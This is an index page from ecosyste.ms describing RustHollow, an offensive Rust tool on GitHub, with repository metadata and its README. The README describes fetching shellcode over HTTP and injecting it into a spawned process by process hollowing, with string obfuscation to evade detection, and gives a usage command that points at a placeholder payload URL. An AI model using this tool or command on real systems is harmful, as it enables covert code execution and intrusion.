Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Kudaes/RustHollow

Inject a shellcode in a remote process using Process Hollowing.
https://github.com/Kudaes/RustHollow

Last synced: 6 days ago
JSON representation

Inject a shellcode in a remote process using Process Hollowing.

Host: GitHub
URL: https://github.com/Kudaes/RustHollow
Owner: Kudaes
Created: 2021-09-17T12:25:20.000Z (about 3 years ago)
Default Branch: main
Last Pushed: 2021-09-18T12:22:49.000Z (about 3 years ago)
Last Synced: 2024-08-02T16:30:48.206Z (3 months ago)
Language: Rust
Homepage:
Size: 4.88 KB
Stars: 40
Watchers: 2
Forks: 3
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-offensive-rust - RustHollow - Inject a shellcode in a remote process using Process Hollowing. (Projects)

README

# RustHollow

This tool will use HTTP to download a shellcode from a remote address and inject it in a newly spawned process by using the process hollowing technique.
Since we are using [LITCRYPT](https://github.com/anvie/litcrypt.rs) plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

After that, simply compile the code and execute it:

cargo build
rust_hollow.exe http://yourip/yourshellcode.bin